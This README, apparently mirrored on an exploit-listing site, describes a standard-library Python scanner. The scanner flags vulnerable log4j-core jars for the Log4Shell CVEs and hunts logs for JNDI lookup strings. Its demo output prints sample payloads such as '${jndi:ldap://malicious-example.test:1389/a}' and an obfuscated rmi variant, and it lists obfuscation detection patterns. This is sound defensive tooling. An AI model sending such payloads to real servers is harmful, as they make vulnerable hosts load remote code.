Share
## https://sploitus.com/exploit?id=DCF70C95-DA47-584E-AB4E-591AF9693EF0
# log4shell-scanner

**A dependency-free, defensive scanner for Log4Shell โ€” finds vulnerable log4j-core jars and JNDI exploit patterns in logs and config.**

## Why this project

During my **CERT-In** rotation I worked on threat identification, containment, remediation and threat hunting โ€” exactly the workflow Log4Shell (CVE-2021-44228) demanded at scale in December 2021: find every vulnerable `log4j-core` artefact across a fleet, and hunt logs for `${jndi:...}` exploitation attempts. This scanner reconstructs that defensive workflow in a single, portable, standard-library Python script that needs nothing installed on the host it inspects.

## Features

- **Archive discovery** โ€” walks a directory tree for `.jar` / `.war` / `.ear` files.
- **Authoritative version detection** โ€” reads `pom.properties` and `MANIFEST.MF` from inside each archive with `zipfile`, falling back to the filename; distinguishes real log4j-core from unrelated jars.
- **CVE flagging** across the Log4Shell family:
  - **CVE-2021-44228** (RCE) โ€” log4j-core 2.0-beta9 โ€ฆ 2.14.1
  - **CVE-2021-45046** (incomplete fix) โ€” up to 2.15.0
  - **CVE-2021-45105** (DoS) โ€” up to 2.16.0
- **Exploit-pattern hunting** โ€” greps logs/config/source for `${jndi:ldap://` and common **obfuscations** (`${${lower:j}ndi:โ€ฆ}`, brace-split `j}ndi:`, `${::-j}`).
- **Actionable remediation** โ€” upgrade to 2.17.1+, or strip `JndiLookup.class`, plus egress-monitoring guidance.
- **Bundled sample tree** with a fake vulnerable `log4j-core-2.14.1.jar` (real zip containing a log4j-core `pom.properties`), a patched `2.17.1.jar`, an unrelated jar, and a log with JNDI payloads.
- **`--demo`** builds and scans the sample tree end-to-end.
- Pure **Python standard library** (`os`, `re`, `zipfile`). No dependencies.

## Tech stack

Python 3 (standard library only: `argparse`, `os`, `re`, `zipfile`).

## Installation

```bash
git clone https://github.com/arpitgupta369/log4shell-scanner.git
cd log4shell-scanner
python --version   # Python 3.8+
# no dependencies to install
```

## Usage

Run the demo against the bundled sample tree:

```bash
python log4shell_scan.py --demo
```

Expected output (abridged):

```
--- Archives (log4j-core detection) ---
  [ok]         .../commons-lang3-3.12.0.jar
        version: unknown   (via no log4j-core detected)
  [VULNERABLE] .../log4j-core-2.14.1.jar
        version: 2.14.1   (via pom.properties (...))
        !! CVE-2021-44228: Critical RCE via JNDI lookup (Log4Shell).
        !! CVE-2021-45046: Incomplete fix; RCE/DoS in certain configs.
        !! CVE-2021-45105: Uncontrolled recursion -> Denial of Service.
  [ok]         .../log4j-core-2.17.1.jar
        version: 2.17.1   (via pom.properties (...))

--- Exploit-pattern matches (JNDI payloads in text/logs) ---
  [MATCH] .../access.log (2 hit(s))
        L2: ... "User-Agent: ${jndi:ldap://malicious-example.test:1389/a}"
        L3: ... "X-Api: ${${lower:j}ndi:rmi://evil-example.test/b}"

--- Summary ---
  Vulnerable archives:      1
  Files with JNDI patterns: 1
```

Scan any directory you are authorised to assess:

```bash
python log4shell_scan.py /path/to/deployed/app
```

The process exit code is **1** when anything vulnerable or suspicious is found, **0** when clean โ€” convenient for CI/pipeline gating.

Rebuild the sample tree at any time:

```bash
python log4shell_scan.py --build-samples
```

## Project structure

```
log4shell-scanner/
โ”œโ”€โ”€ log4shell_scan.py      # scanner + sample-tree builder + CLI
โ”œโ”€โ”€ samples/
โ”‚   โ””โ”€โ”€ app/
โ”‚       โ”œโ”€โ”€ libs/
โ”‚       โ”‚   โ”œโ”€โ”€ log4j-core-2.14.1.jar     # fake VULNERABLE jar (real zip)
โ”‚       โ”‚   โ”œโ”€โ”€ log4j-core-2.17.1.jar     # patched jar
โ”‚       โ”‚   โ””โ”€โ”€ commons-lang3-3.12.0.jar  # unrelated jar
โ”‚       โ”œโ”€โ”€ logs/
โ”‚       โ”‚   โ””โ”€โ”€ access.log                # contains JNDI payloads
โ”‚       โ””โ”€โ”€ config.properties             # benign (should not match)
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ LICENSE
โ””โ”€โ”€ .gitignore
```

## Disclaimer

For **educational, defensive, and authorised use only**. Run it only against systems and artefacts you have permission to assess. The scanner **reads and pattern-matches only** โ€” it never executes or exploits anything. The bundled sample jars are **fabricated placeholders**, not genuine Apache artefacts, and all payload hostnames use non-routable `.test` names. Version-to-CVE mappings are provided for orientation; verify against the official CVE and Apache Log4j security advisories.

---

Built by **Arpit Gupta** โ€” [LinkedIn](https://linkedin.com/in/arpit-gupta-060b302a7/) ยท [GitHub](https://github.com/arpitgupta369)